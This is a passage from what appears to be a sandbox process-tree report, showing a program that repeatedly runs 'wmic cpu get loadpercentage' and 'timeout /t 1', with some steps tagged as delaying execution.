    PID:2128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2560
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4484
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4276
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3856
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2152
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4264
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3284
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4796
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3908
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1564
